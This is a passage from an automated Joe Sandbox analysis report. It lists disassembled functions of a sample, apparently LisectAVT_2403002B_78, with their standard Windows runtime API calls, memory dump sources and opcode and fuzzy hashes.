                                                                      • GetLastError.KERNEL32(?,00AC1F9B,00000000,00000001,?,?,?,00AB6CBD,?,00000000,00000000,?,?,?,00AB7297,00000000), ref: 00AC5BE6
                                                                        • Part of subcall function 00AC5BAC: CloseHandle.KERNEL32(FFFFFFFE,00AC5BF6,?,00AC1F9B,00000000,00000001,?,?,?,00AB6CBD,?,00000000,00000000,?,?), ref: 00AC5BBC
                                                                      • ___initconout.LIBCMT ref: 00AC5BF6
                                                                        • Part of subcall function 00AC5B6E: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00AC5B9D,00AC1F88,?,?,00AB6CBD,?,00000000,00000000,?), ref: 00AC5B81
                                                                      • WriteConsoleW.KERNEL32(00000000,00000000,00AB0FCF,00000000,?,00AC1F9B,00000000,00000001,?,?,?,00AB6CBD,?,00000000,00000000,?), ref: 00AC5C0B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                      • String ID:
                                                                      • API String ID: 2744216297-0
                                                                      • Opcode ID: bcc1c2eac9284037da0c0c5abe22eddc5f32ad2e3a22bf949bef4f9575a1ed07
                                                                      • Instruction ID: 8f7ceeccef838e8ec6ecc38c07921941872bde471fc03b45a36a57844d4b0818
                                                                      • Opcode Fuzzy Hash: bcc1c2eac9284037da0c0c5abe22eddc5f32ad2e3a22bf949bef4f9575a1ed07
                                                                      • Instruction Fuzzy Hash: 92F01236811519BBCF225FE5DC04E8E3F26FB047E0F464014F91995130DA329D619B90
                                                                      APIs
                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00AAC84F
                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00AAC903
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                      • String ID: csm
                                                                      • API String ID: 3480331319-1018135373
                                                                      • Opcode ID: 81166ea33f581baaa8f41d2518558cc3bb6510a94b049f128b7335ed347182e1
                                                                      • Instruction ID: 50a2a05ac1863bc8b0786f9435a887ef97b0357376b677406b4df827cfde725f
                                                                      • Opcode Fuzzy Hash: 81166ea33f581baaa8f41d2518558cc3bb6510a94b049f128b7335ed347182e1
                                                                      • Instruction Fuzzy Hash: 6C41A434E00209AFDF10DF68C885A9EBBB5BF4A324F148156E819AB3D2D735D905CF90
                                                                      APIs
                                                                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00AAD147
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: EncodePointer
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 2118026453-2084237596
                                                                      • Opcode ID: ed49575cf8f4c82cf24e5b3ce7bfe6b55476cea801821ee0024f94bc5ebf8ce1
                                                                      • Instruction ID: 5ebc622c466738d0c40a6baf4679f9efa8826794e952c08b5692c9367d54c32f
                                                                      • Opcode Fuzzy Hash: ed49575cf8f4c82cf24e5b3ce7bfe6b55476cea801821ee0024f94bc5ebf8ce1
                                                                      • Instruction Fuzzy Hash: F1415672900209AFCF15DF98CD81AEEBBB5BF4A300F148199F905B72A1D335DA51DB50
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2843110692.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.2843094873.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843137055.0000000000AC8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843156458.0000000000AD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2843174170.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_aa0000_LisectAVT_2403002B_78.jbxd
                                                                      Similarity
                                                                      • API ID: char_traitscodecvt
                                                                      • String ID:
                                                                      • API String ID: 1910604377-3916222277
                                                                      • Opcode ID: aa37150b5d08dbbb7838f528ed59c5b09e75053191fb0526cbfe20edd545f021
                                                                      • Instruction ID: 893b8ce7df5bf319ad6c450fe2d67a974876ca8a3ecbe775e517e21dda816075
                                                                      • Opcode Fuzzy Hash: aa37150b5d08dbbb7838f528ed59c5b09e75053191fb0526cbfe20edd545f021
                                                                      • Instruction Fuzzy Hash: A8316970D04609EFCF44DFA4C594AEEB7B5AF46304F288199E012AB281E735AF45EB64